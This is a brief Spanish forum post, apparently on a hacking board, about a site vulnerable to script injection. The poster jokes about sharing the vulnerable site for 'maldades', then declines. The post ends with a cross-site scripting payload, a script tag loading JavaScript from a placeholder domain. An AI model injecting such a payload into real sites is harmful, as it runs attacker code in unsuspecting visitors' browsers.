Buen punto... Muchas gracias..
Creo que sin poder ingresar el ' y " voy a ahcer poca cosa solo...
Mejor dejo todo tranquilo.. sin maldades..
Por las dudas, si alguien quiere hacer maldades.. que me diga por MP y le paso la web con la vulnerabilidad...
nop xD
<script src=http://tudominio/tuscript.js ></script>
Saludos!